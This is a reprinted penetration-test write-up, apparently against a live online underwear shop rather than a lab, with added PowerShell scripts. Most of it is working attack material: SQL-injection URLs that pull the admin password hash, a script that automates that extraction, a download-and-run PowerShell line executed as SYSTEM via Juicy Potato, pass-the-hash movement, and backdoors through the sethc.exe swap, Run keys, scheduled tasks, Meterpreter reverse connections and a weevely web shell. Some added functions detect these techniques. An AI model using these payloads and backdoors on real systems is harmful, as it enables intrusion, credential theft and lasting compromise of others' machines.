
Title: A record of a penetration test against an underwear shop website


This site is really big. No wait, this site is really round. It's a .php site, so it can be tested casually.

0x01 Injection

Because an extractvalue() error message only shows 32 characters of the XPath string, substring() is used to read the value out in pieces. The 0x7e ('~') delimiters in concat() mark where the leaked value begins and ends inside the error text; since the leading '~' uses one of the 32 characters, the first query exposes 31 characters of the hash, and the second query starts at offset 30 so that it overlaps the first read.

https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20#

https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#
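The chunked read that the two URLs above perform, as an added PowerShell example that is not part of the original write-up. The injection point and inner query are the ones from the URLs; the admin table, the hash value that comes back and the HTTP side are constructed (a mock function stands in for the vulnerable page so the script runs offline), and the 31-character step follows from MySQL's 32-character error limit minus the '~' delimiter.

```powershell
# Added example, not from the original write-up: page a long value out of
# extractvalue() error text in 31-character chunks, the way the two URLs above do.
# MySQL truncates the XPATH error string to 32 characters and the leading 0x7e
# ('~') delimiter uses one of them, so each query leaks at most 31 characters.
# The injection point, the 'admin' table and the hash the mock returns are all
# constructed; swap Invoke-MockTarget for a real request on an authorised target.

$Base     = 'https://aaaa.com/1.php?id=210'            # injection point from the write-up
$Inner    = 'select password from admin limit 1,1'     # inner query from the write-up
$ChunkLen = 31

function New-ExtractValuePayload {
    param([int]$Start)
    # substring() is 1-based. concat() wraps the chunk in '~' so the parser can
    # tell where MySQL's own text ends and where the leaked data starts/ends.
    $expr = "extractvalue(1,concat(0x7e,substring(($Inner),$Start,$ChunkLen),0x7e))"
    return "$Base and $expr #"        # URL-encode before sending (the page shows %20)
}

function Get-LeakedChunk {
    param([string]$Response)
    # Typical body: XPATH syntax error: '~0123456789abcdef0123456789abcde'
    # A trailing '~' is only present when the chunk is shorter than 31 characters.
    if ($Response -match "XPATH syntax error: '~([^']*)") { return $Matches[1].TrimEnd('~') }
    return $null
}

function Invoke-MockTarget {
    param([string]$Url)
    # Offline stand-in for the vulnerable page: evaluates substring() on a
    # constructed value and truncates to 32 characters exactly as MySQL does.
    $secret = '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'   # constructed, not a real credential
    if ($Url -match 'substring\(\(.*?\),(\d+),(\d+)\)') {
        $start = [int]$Matches[1] - 1
        $len   = [int]$Matches[2]
        $piece = ''
        if ($start -lt $secret.Length) {
            $piece = $secret.Substring($start, [Math]::Min($len, $secret.Length - $start))
        }
        $text = '~' + $piece + '~'
        if ($text.Length -gt 32) { $text = $text.Substring(0, 32) }
        return "XPATH syntax error: '$text'"
    }
    throw 'unexpected payload'
}

function Get-FullValue {
    # Walk the value in 31-character steps until a chunk comes back short.
    $out   = ''
    $start = 1
    while ($true) {
        $url   = New-ExtractValuePayload -Start $start
        $chunk = Get-LeakedChunk (Invoke-MockTarget $url)
        if ([string]::IsNullOrEmpty($chunk)) { break }
        $out += $chunk
        if ($chunk.Length -lt $ChunkLen) { break }
        $start += $ChunkLen
    }
    return $out
}

Get-FullValue
```

Against a live target, replace Invoke-MockTarget with something like (Invoke-WebRequest -Uri ([uri]::EscapeUriString($url))).Content and keep the rest; the short-chunk stop condition is what prevents the loop from running forever on a value whose length you do not know in advance.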

Feels good. Now you can go in and pick underwear openly.

0x02 Getshell. First have a look at robots.txt.

Google dork: inurl:a.com admin

After getting into the backend I found it was ECSHOP. The upload filter was bypassed here by changing the file type to an image.

It looks like it has been reset.

Here I found that SQL statements can be executed from the backend, and an absolute path is leaked.

OK, enough said: write a one-line webshell.

0x03 Privilege escalation

The privileges are a bit low.

There is no other route except through MySQL.

Try escalating via MySQL (UDF).

Every condition is met except that the directory the UDF library would go into cannot be uploaded to, so forget that. Switch to CS (Cobalt Strike) and bring the host online with a PowerShell stager.

Juicy Potato is used here; see the article by Sanhao Students (三好学生) for details. Pick any CLSID that works on the target's Windows version. Link

Then we are executing PowerShell with SYSTEM privileges:

shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell address'))\"" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Remember to escape the double quotes here. style.exe is the renamed Juicy Potato binary and 'powershell address' stands for the stager URL. Juicy Potato only works when the current context holds SeImpersonatePrivilege (service accounts such as the ones IIS or MySQL run under usually do), the CLSID has to match the Windows version, and the technique no longer works on Windows 10 1809 / Server 2019 and later.

0x04 Lateral movement

It is a workgroup environment. A scan turned up .9, which is also a web server. Pass-the-hash is used here: pass the hash over to it and dump the hashes there directly. The accounts found so far are:

wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin

WDAGUtilityAccount

Plain pass-the-hash:

.9 should be a web demo machine, and .7 is probably a database server.

All of them have admin privileges. If you want SYSTEM, you can use SelectMyParent, which simply makes a SYSTEM process the parent of the new process it creates (PPID spoofing), so the child inherits SYSTEM. Here we use the CS beacon; first check the PID of winlogon.exe.

You can see that it is 500.

Then upload our system.exe and run: shell SelectMyParent.exe system.exe 500

This step is really just to pad the word count, hahaha.
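The defender's view of the SelectMyParent step above, as an added PowerShell example that is not part of the original write-up. A process launched with a spoofed parent really is recorded as that parent's child, so the check lists every child of winlogon.exe and flags anything outside the set of children winlogon normally spawns. The expected-children list is an assumption for a default Windows install and should be tuned per environment; nothing here comes from the write-up's target.

```powershell
# Added example, not from the original write-up: find processes that claim
# winlogon.exe as their parent but are not something winlogon normally starts.
# PPID spoofing (SelectMyParent, Cobalt Strike's ppid, etc.) shows up exactly
# this way, because the spoofed parent is what the kernel records.
# The expected-children list below is an assumption for a stock install.

$ExpectedWinlogonChildren = @(
    'LogonUI.exe', 'userinit.exe', 'dwm.exe', 'fontdrvhost.exe',
    'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe'
)

function Get-SuspiciousWinlogonChildren {
    $procs = Get-CimInstance Win32_Process
    $winlogonIds = @($procs | Where-Object Name -eq 'winlogon.exe' | ForEach-Object ProcessId)

    $procs |
        Where-Object { $_.ParentProcessId -in $winlogonIds -and $_.Name -notin $ExpectedWinlogonChildren } |
        ForEach-Object {
            # GetOwner tells us whether the child actually got the SYSTEM token.
            $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
            [pscustomobject]@{
                Pid     = $_.ProcessId
                Parent  = $_.ParentProcessId
                Name    = $_.Name
                User    = "$($owner.Domain)\$($owner.User)"
                Command = $_.CommandLine
            }
        }
}

Get-SuspiciousWinlogonChildren | Format-Table -AutoSize
```

Process-creation logs that take the parent from the process object (Sysmon event 1 included) show the spoofed parent as well, so an alert on "unexpected child of winlogon.exe running as SYSTEM" is the practical signal; the real creator is only visible to kernel ETW consumers.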

0x05 Persistence (this part was tested locally)

Sticky keys backdoor. Pressing Shift five times in a row on Windows brings up Sticky Keys.

Sticky Keys is an accessibility shortcut for people who have difficulty pressing two or more keys at the same time: instead of holding Shift together with another key, you press Shift first and then the other key. By default Windows shows the Sticky Keys prompt after Shift is pressed five times; the prompt is sethc.exe, and on the logon screen winlogon.exe launches it as SYSTEM, which is what makes the swap useful.

Use the following commands:

cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe

If the target is Windows Vista or later, modifying sethc.exe prompts that TrustedInstaller permission is required, so to continue you first have to take ownership (change the owner to Administrators) and then adjust its permissions:

Then grant Full control.

Now press Shift five times in a row at the logon screen and a cmd.exe running as SYSTEM pops up.
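The Vista-and-later version of the procedure above (take ownership, grant full control, swap the binary), plus the check a responder runs to spot the swap, as an added PowerShell example that is not part of the original write-up. It uses takeown and icacls for the two permission steps the write-up shows as screenshots; the Administrators group is addressed by SID so it works on non-English systems, and the install function is left commented out because it modifies a system binary.

```powershell
# Added example, not from the original write-up: the sethc.exe swap on Windows
# Vista and later, where the file is owned by TrustedInstaller, followed by the
# check a defender would run. Run from an elevated PowerShell on a lab machine.
# Paths are the standard ones; everything else is an assumption.

$Sys32 = Join-Path $env:SystemRoot 'System32'
$Sethc = Join-Path $Sys32 'sethc.exe'
$Cmd   = Join-Path $Sys32 'cmd.exe'

function Install-StickyKeyBackdoor {
    # 1. take ownership away from TrustedInstaller
    # 2. grant Administrators (S-1-5-32-544, locale-independent) full control
    # 3. keep a copy and replace sethc.exe with cmd.exe
    takeown.exe /f $Sethc | Out-Null
    icacls.exe $Sethc /grant '*S-1-5-32-544:F' | Out-Null
    Move-Item -Path $Sethc -Destination "$Sethc.bak" -Force
    Copy-Item -Path $Cmd -Destination $Sethc
}

function Test-StickyKeyBackdoor {
    # Detection: sethc.exe should not hash like cmd.exe, its owner should still
    # be TrustedInstaller, no backup copy should sit next to it, and no Image
    # File Execution Options debugger may be registered for it (the registry
    # variant of the same trick, which needs no file replacement at all).
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
    $debugger = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger

    [pscustomobject]@{
        ReplacedWithCmd  = ((Get-FileHash $Sethc -Algorithm SHA256).Hash -eq (Get-FileHash $Cmd -Algorithm SHA256).Hash)
        Owner            = (Get-Acl $Sethc).Owner      # expect NT SERVICE\TrustedInstaller
        BackupLeftBehind = Test-Path "$Sethc.bak"
        IfeoDebugger     = $debugger                   # expect $null
    }
}

# Install-StickyKeyBackdoor   # only on a machine you own; it replaces a system binary
Test-StickyKeyBackdoor
```

The same check applies to the other accessibility binaries winlogon launches from the logon screen (utilman.exe, osk.exe, narrator.exe, magnify.exe), and Windows Defender flags both the file swap and the IFEO variant, so on a real engagement expect it to be noticed.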

Registry Run-key backdoor

The attacker writes the path of the backdoor program or script that should be executed into the Run key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Writing under HKEY_LOCAL_MACHINE needs administrator rights; with only normal user rights the same key under HKEY_CURRENT_USER works and fires for that user alone. The value name can be anything. The startup entry can also be added directly with the following command:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"

The next time a user logs on interactively (the administrator, in this scenario) the backdoor program is executed.

Scheduled task backdoor

Command: schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

The command above runs shell.exe once an hour. On Windows 7 and earlier the older at command can be used instead of schtasks (at was removed in Windows 8).
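The Run-key and scheduled-task entries from the two sections above, written out as PowerShell with the hive choice made explicit, plus the audit an incident responder runs over both locations. This is an added example and not part of the original write-up; C:\shell.exe, the value name test and the task name Updater are the write-up's placeholders, and the "outside the Windows directory" filter in the audit is an assumption to keep the output readable.

```powershell
# Added example, not from the original write-up: the two persistence entries
# described above, and an audit that lists what is registered in both places.
# Names and paths (C:\shell.exe, 'test', 'Updater') are the write-up's
# placeholders; nothing here is a real sample.

$RunHKLM = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   # all users; needs admin
$RunHKCU = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   # current user only

function Add-RunKeyBackdoor {
    param([string]$Path = 'C:\shell.exe', [string]$Name = 'test', [switch]$AllUsers)
    # Same as: reg add "HKLM\...\Run" /v test /t REG_SZ /d "C:\shell.exe"
    # Without admin rights only the HKCU hive is writable, so default to it.
    $hive = if ($AllUsers) { $RunHKLM } else { $RunHKCU }
    New-ItemProperty -Path $hive -Name $Name -Value $Path -PropertyType String -Force | Out-Null
}

function Add-ScheduledBackdoor {
    param([string]$Path = 'C:\shell.exe', [string]$Name = 'Updater')
    # Same as: schtasks /Create /tn Updater /tr C:\shell.exe /sc hourly /mo 1
    schtasks.exe /Create /tn $Name /tr $Path /sc hourly /mo 1 /f | Out-Null
}

function Get-PersistenceEntries {
    # Every Run/RunOnce value in both hives, plus scheduled tasks whose action
    # lives outside the Windows directory (assumed filter; widen it as needed).
    $keys = foreach ($hive in 'HKLM:', 'HKCU:') {
        foreach ($sub in 'Run', 'RunOnce') {
            $k = "$hive\SOFTWARE\Microsoft\Windows\CurrentVersion\$sub"
            if (Test-Path $k) {
                (Get-ItemProperty $k).PSObject.Properties |
                    Where-Object { $_.Name -notlike 'PS*' } |      # drop PSPath & co.
                    ForEach-Object { [pscustomobject]@{ Source = $k; Name = $_.Name; Command = $_.Value } }
            }
        }
    }
    $tasks = Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if ($a.Execute -and $a.Execute -notmatch '^(%SystemRoot%|%windir%|C:\\Windows)') {
                [pscustomobject]@{
                    Source  = "Task:$($task.TaskPath)$($task.TaskName)"
                    Name    = $task.TaskName
                    Command = "$($a.Execute) $($a.Arguments)".Trim()
                }
            }
        }
    }
    @($keys) + @($tasks)
}

# Add-RunKeyBackdoor            # lab use only
# Add-ScheduledBackdoor         # lab use only
Get-PersistenceEntries | Format-Table -AutoSize
```

Both entries are plain-text and user-visible (regedit, Task Scheduler, Autoruns), which is why they are the first places a responder looks; the audit above is the minimum you would run on a host suspected of being the one this write-up describes.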

Meterpreter backdoor

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A

Options:

-A  Automatically start a matching exploit/multi/handler to connect to the agent
-L  Location on the target host to write the payload to; if none is given, %TEMP% is used
-P  Payload to use; default is windows/meterpreter/reverse_tcp
-S  Automatically start the agent as a service (with SYSTEM privileges)
-T  Alternate executable template to use
-U  Automatically start the agent when the user logs on
-X  Automatically start the agent when the system boots
-h  This help menu
-i  The interval in seconds between each connection attempt
-p  The port on which the system running Metasploit is listening
-r  The IP of the system running Metasploit listening for the connect back

The drawback is that it is easily caught by antivirus: it drops a new .vbs file on the target and registers it to start automatically every time. The persistence script has since been deprecated in Metasploit in favour of the exploit/windows/local/persistence module, which behaves the same way.

Web backdoor: you can use weevely to generate a shell.php; it is used here for testing.

Put the file in the web directory and connect to it:

weevely http://192.168.220.1/shell.php shell

Here shell is the password chosen when the shell was generated; help inside the weevely session shows the available commands. Modules:

audit.etcpasswd | Enumerate /etc/passwd
audit.userfiles | List files under user home directories with their permissions
audit.mapwebfiles | Enumerate the URL links of any web site
shell.php | Run PHP code
shell.sh | Run system shell commands
system.info | Collect system information
find.suidsgid | Find SUID/SGID files and directories
find.perms | Find readable/writable/executable files and directories
backdoor.tcp | TCP port backdoor
backdoor.reversetcp | Reverse TCP connection
bruteforce.sql | Brute-force a given database user's password
bruteforce.sqlusers | Brute-force the passwords of all database users
file.upload | Upload a local file
file.upload2web | Upload binary/ASCII files into the target site's folder and enumerate their URLs
file.enum | Enumerate remote files from a local wordlist
file.read | Read a file
file.rm | Delete a file
file.check | Check the status of a remote file (MD5, size, permissions, etc.)
file.download | Download a remote binary/ASCII file to the local machine
sql.console | Start a SQL console
sql.dump | Dump a database
net.scan | Port scan
net.phpproxy | Install a remote PHP proxy
net.ifaces | Show the remote host's network interfaces
net.proxy | Install a tunnelling proxy

Some Windows commands can be run as well.

Run one of the built-in modules:

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247485826idx=2sn=8f11b7cc12f6c5dfb5eeeeb316f14f460chksm=ce67a31bf9102a0d704877584dc3c49141a376cc1b35c0659f3ae72baa7e77e6de7e0f916db5scene=21#wechat_redirect
